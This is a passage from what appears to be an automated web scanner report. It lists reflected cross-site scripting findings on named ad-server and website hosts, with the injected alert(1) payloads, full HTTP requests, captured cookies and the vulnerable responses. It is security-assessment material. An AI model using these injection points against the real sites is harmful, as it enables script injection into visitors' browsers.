Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa931d"><script>alert(1)</script>2e0f0c892ca/2010DM/589785859/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.385. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1902448725@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7694"><script>alert(1)</script>7991189005e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe7694"><script>alert(1)</script>7991189005e/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe7694"><script>alert(1)</script>7991189005e/605886075/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.386. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1902448725@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1767"><script>alert(1)</script>cb7edce5f32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1902448725@x23c1767"><script>alert(1)</script>cb7edce5f32?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1536711956/x23c1767"><script>alert(1)</script>cb7edce5f32/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.387. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1902448725@x23

Issue detail

The value of the USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf8b8"-alert(1)-"1605863f2c2 was submitted in the USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300bf8b8"-alert(1)-"1605863f2c2 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300bf8b8"-alert(1)-"1605863f2c2";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.388. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1902448725@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd125"-alert(1)-"6bc97e60a08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300&dd125"-alert(1)-"6bc97e60a08=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2489
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300&dd125"-alert(1)-"6bc97e60a08=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.389. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11678985058@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbff"><script>alert(1)</script>e5afcf36e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM8bbff"><script>alert(1)</script>e5afcf36e30/DLX/11678985058@x95?na_id= HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM8bbff"><script>alert(1)</script>e5afcf36e30/DLX/1973539250/x95/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.390. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11678985058@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633d5"><script>alert(1)</script>bb101675df9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX633d5"><script>alert(1)</script>bb101675df9/11678985058@x95?na_id= HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX633d5"><script>alert(1)</script>bb101675df9/414298719/x95/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.391. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11678985058@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e11"><script>alert(1)</script>6e135e30f8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11678985058@x95f9e11"><script>alert(1)</script>6e135e30f8a?na_id= HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/940763935/x95f9e11"><script>alert(1)</script>6e135e30f8a/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.392. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [na_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11678985058@x95

Issue detail

The value of the na_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c19f'-alert(1)-'e256993ce30 was submitted in the na_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/DLX/11678985058@x95?na_id=8c19f'-alert(1)-'e256993ce30 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2554
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_list = 'na_id=8c19f'-alert(1)-'e256993ce30';
dlx_segment_list = dlx_segment_list.replace(/&/g,'|');
dlx_segment_list = dlx_segment_list.replace(/na_da=/g,'');

var dlx_segment_list_pairs=dlx_segment_list.split('|');
var ZAP_url='//t.mooki
...[SNIP]...

4.393. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11678985058@x95

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91653'-alert(1)-'7447a25ebae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/DLX/11678985058@x95?na_id=&91653'-alert(1)-'7447a25ebae=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2556
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_list = 'na_id=&91653'-alert(1)-'7447a25ebae=1';
dlx_segment_list = dlx_segment_list.replace(/&/g,'|');
dlx_segment_list = dlx_segment_list.replace(/na_da=/g,'');

var dlx_segment_list_pairs=dlx_segment_list.split('|');
var ZAP_url='//t.moo
...[SNIP]...

4.394. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f1d"><script>alert(1)</script>19238ad28da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM50f1d"><script>alert(1)</script>19238ad28da/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM50f1d"><script>alert(1)</script>19238ad28da/DLX/513286872/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.395. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353bc"><script>alert(1)</script>1ee4471c2b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX353bc"><script>alert(1)</script>1ee4471c2b4/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX353bc"><script>alert(1)</script>1ee4471c2b4/2126199330/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.396. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 755bc"><script>alert(1)</script>1f0f4c39874 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/@x94755bc"><script>alert(1)</script>1f0f4c39874 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1787170245/x94755bc"><script>alert(1)</script>1f0f4c39874/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.397. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
